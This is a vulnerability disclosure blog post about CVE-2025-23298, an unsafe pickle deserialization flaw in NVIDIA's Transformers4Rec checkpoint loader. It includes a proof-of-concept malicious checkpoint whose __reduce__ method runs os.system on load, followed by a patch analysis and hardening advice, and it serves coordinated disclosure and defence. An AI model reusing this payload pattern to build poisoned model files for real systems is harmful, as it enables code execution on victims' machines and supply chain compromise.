CVE-2025-23298: Getting Remote Code Execution in NVIDIA Merlin

September 24, 2025 | Peter Girnus

While investigating the security posture of various machine learning (ML) and artificial intelligence (AI) frameworks, the Trend Micro Zero Day Initiative (ZDI) Threat Hunting Team discovered a critical vulnerability in the NVIDIA Merlin Transformers4Rec library that could allow an attacker to achieve remote code execution with root privileges. This vulnerability, tracked as CVE-2025-23298, stems from unsafe deserialization practices in the model checkpoint loading functionality. What makes this finding particularly interesting is not just the vulnerability itself, but how it highlights the endemic security challenges created by the ML/AI ecosystem’s reliance on Python’s pickle serialization.

In this post, I’ll walk through the discovery process, demonstrate the exploitation technique, analyze the patch, and discuss why this class of vulnerability continues to plague machine learning frameworks despite years of warnings from the security community.

NVIDIA Transformers4Rec

NVIDIA Transformers4Rec is part of the Merlin ecosystem, designed to leverage state-of-the-art transformer architectures for sequential and session-based recommendation tasks. Transformers4Rec acts as a bridge between natural language processing (NLP) and recommender systems (RecSys) by integrating with one of the most popular NLP frameworks, Hugging Face Transformers (HF). According to NVIDIA, Transformers4Rec makes state-of-the-art transformer architectures available for RecSys researchers and industry practitioners.

Transformers4Rec is widely used in production environments for building recommendation systems, particularly in e-commerce and content platforms. The library integrates with other NVIDIA tools like NVTabular for preprocessing and Triton Inference Server (a target in the inaugural AI category at Pwn2Own Berlin 2025) for deployment, making it a critical component in many ML pipelines.

During our research into ML/AI supply chain security, we decided to audit how various frameworks handle model persistence and loading. Given the popularity of Transformers4Rec in production environments and its integration with PyTorch’s serialization mechanisms, it became an interesting target for analysis. 

The Vulnerability Discovery

The vulnerability exists in the load_model_trainer_states_from_checkpoint function, which is responsible for restoring model states during training resumption or model deployment. While reviewing the codebase, we noticed that this function directly uses PyTorch’s torch.load() without any safety parameters. Here’s the vulnerable checkpoint loading function before the patch:
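
A simplified sketch of the pre-patch pattern (member names are abbreviated here for readability; this is not the verbatim library source) shows the checkpoint file handed straight to torch.load() with no restrictions:

```python
import os
import torch

def load_model_trainer_states_from_checkpoint(self, checkpoint_path):
    # Simplified sketch of the pre-patch pattern: the checkpoint file is
    # passed directly to torch.load(), i.e. to pickle, with no weights_only
    # flag and no restriction on which classes may be deserialized.
    state_path = os.path.join(checkpoint_path, "pytorch_model.bin")
    state_dict = torch.load(state_path)      # unsafe pickle-based deserialization
    self.model.load_state_dict(state_dict)   # weights are applied only afterwards
```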

This immediately raised red flags. The torch.load() function uses Python’s pickle module under the hood, which is notoriously unsafe when handling untrusted data. The pickle protocol allows arbitrary Python objects to be serialized and deserialized, including objects that execute code during the deserialization process.

Understanding the Attack Surface

To understand why this is dangerous, we need to examine how pickle works. When pickle deserializes an object, it can execute arbitrary Python code through methods such as __reduce__. This isn’t a bug – it’s a feature that allows complex objects to control their own serialization process. However, it becomes a severe security vulnerability when loading untrusted pickle files.
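
As a minimal, benign illustration of the mechanism: an object can return a callable and its arguments from __reduce__, and pickle will invoke that callable while reconstructing the object.

```python
import pickle

class Demo:
    def __reduce__(self):
        # pickle will call print("hello from __reduce__") while deserializing
        return (print, ("hello from __reduce__",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # the print call fires here, during deserialization
```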

The attack surface is particularly concerning because:

1. Model sharing is common: Data scientists regularly share pre-trained models through repositories, cloud storage, or direct file transfers.

2. Checkpoint files are trusted: Developers often assume checkpoint files are safe, especially when they appear to come from legitimate sources.

3. Execution context: The vulnerability executes in the context of the process loading the model, which often runs with elevated privileges in production environments.

Crafting the Exploit

To demonstrate the vulnerability, we created a malicious checkpoint file that would execute arbitrary commands upon loading. The exploit leverages pickle’s __reduce__ method to execute system commands:
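
A sketch of this kind of payload (the command and file names below are illustrative) replaces the expected state dictionary with an object whose __reduce__ returns os.system:

```python
import os
import torch

class MaliciousPayload:
    def __reduce__(self):
        # Reconstructing this object runs os.system("...") during unpickling.
        return (os.system, ("id > /tmp/pwned",))

# torch.save() uses pickle under the hood, so the payload survives the round trip.
checkpoint = {
    "model_state_dict": MaliciousPayload(),
    "epoch": 1,
}
torch.save(checkpoint, "pytorch_model.bin")
```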

When a victim loads this checkpoint file using the vulnerable function, the os.system command executes immediately before any model weights are loaded. This happens because pickle deserializes objects in order, and our malicious object triggers during the deserialization of model_state_dict.
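
On the victim’s side, nothing special is required to trigger the payload; with a pre-2.6 PyTorch (where weights_only defaults to False) or with the flag explicitly disabled, simply loading the file is enough:

```python
import torch

# The payload fires inside torch.load(), before the caller ever sees
# the returned dictionary or calls load_state_dict().
checkpoint = torch.load("pytorch_model.bin", weights_only=False)
```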

Real-World Impact

The potential impact of this vulnerability can be severe:

— Remote Code Execution: Attackers can execute arbitrary commands on the target system.

— Privilege Escalation: If the ML service runs with elevated privileges (common in production), the attacker gains those privileges.

— Data Exfiltration: Access to training data, model weights, and potentially other sensitive information.

— Supply Chain Attacks: Malicious models could be distributed through model repositories or sharing platforms.

— Lateral Movement: Compromised ML systems could serve as a foothold for broader network intrusion.

The vulnerability is particularly dangerous in automated ML/AI pipelines where models are loaded without human review, such as continuous training systems or automated model deployment pipelines. 

The Patch Analysis

NVIDIA addressed this vulnerability in commit b7eaea5 (PR #802), which changed how checkpoint files are loaded and added input validation of serialized Python objects.

Figure 1 - The patch adding a custom load function in transformers4rec/torch/trainer.trainer.load_model_trainer_states_from_checkpoint

The Transformers4Rec library now implements a serialization mechanism through serialization.py which restricts deserialization to approved classes.

Figure 2 - The patch adding additional validation in transformers4rec/utils/serialization.py
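
A minimal sketch of what an allowlist-based unpickler of this kind looks like (the class and allowlist below are illustrative, not the library’s exact implementation):

```python
import io
import pickle

# Only these (module, name) pairs may be reconstructed from a checkpoint.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Anything outside the allowlist (os.system, builtins.eval, ...) is rejected.
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"Blocked global: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```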

Here’s the checkpoint loading function after the patch:
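
As a rough sketch of the patched approach (names simplified; not the verbatim library source), tensor data is loaded with weights_only=True so that only plain tensors and standard containers are accepted, rather than arbitrary pickled objects:

```python
import os
import torch

def load_model_trainer_states_from_checkpoint(self, checkpoint_path):
    # Rough sketch of the post-patch approach: weights are loaded with
    # weights_only=True; richer objects would instead go through the
    # allowlist-based deserializer sketched above.
    state_path = os.path.join(checkpoint_path, "pytorch_model.bin")
    state_dict = torch.load(state_path, weights_only=True)
    self.model.load_state_dict(state_dict)
```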

Lessons Learned and Recommendations

This vulnerability highlights several important lessons for the AI/ML security community:

For Developers:

• Never use pickle for untrusted data: This cannot be emphasized enough.

• Never assume checkpoint files are safe: Checkpoint deserialization is vulnerable to supply chain attacks.

• Always use weights_only=True when calling PyTorch’s load functions.

• Restrict deserialization to trusted classes: Allow only explicitly approved classes to be reconstructed.

• Implement defense in depth: Don’t rely on a single security measure.

• Consider alternative formats: Safetensors, ONNX, and other secure serialization formats are worth evaluating (see the snippet after this list).
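
For example, the safetensors format stores raw tensor bytes plus a small JSON header and has no code path for reconstructing arbitrary objects; a minimal round trip (assuming the safetensors package is installed) looks like this:

```python
import torch
from safetensors.torch import save_file, load_file

weights = {"embedding.weight": torch.randn(1000, 64)}

# Only tensor data and a JSON header are written; nothing executable
# can be smuggled into the file, unlike a pickle-based checkpoint.
save_file(weights, "model.safetensors")
restored = load_file("model.safetensors")
```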

For Organizations:

• Audit model provenance: Know where your models come from.

• Implement model signing: Cryptographically verify model integrity.

• Sandbox model loading: Run deserialization in isolated environments.

• Regular security audits: Include ML pipelines in security assessments.

For the ML Community:

• Consider moving away from pickle: The community needs to seriously consider deprecating pickle-based serialization.

• Update PyTorch to the latest version: Recent versions of PyTorch default to weights_only=True.

• Develop secure standards: Establish and enforce secure model serialization standards.

• Security-first design: Build ML frameworks with security as a primary consideration, not an afterthought.

Conclusion

CVE-2025-23298 represents yet another instance of unsafe pickle deserialization in the ML/AI ecosystem. While NVIDIA has patched this specific vulnerability, the underlying issue – the ML/AI community’s continued reliance on inherently unsafe serialization methods – remains. As machine learning systems become increasingly critical to business operations and form the foundation of the AI ecosystem, we can no longer afford to treat security as an afterthought. Rigorous security measures and a zero-trust mentality must be central as we develop and push toward agentic AI.

The discovery and coordinated disclosure of this vulnerability (thanks to NVIDIA for their work) hopefully serves as another wake-up call. The question isn’t whether more pickle-related vulnerabilities exist in ML/AI frameworks; it’s how many are currently being exploited in the wild.

Until the community moves away from pickle entirely, we’ll continue to see these vulnerabilities. In the meantime, developers must remain vigilant, implement proper security controls, and treat all model files as potentially hostile. You can find me online here, and you can follow the ZDI team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploitation.

 

Disclosure Timeline

— 2025-05-22 - Vulnerability reported to vendor
— 2025-08-13 - Coordinated public release of advisory
— 2025-08-14 - Advisory updated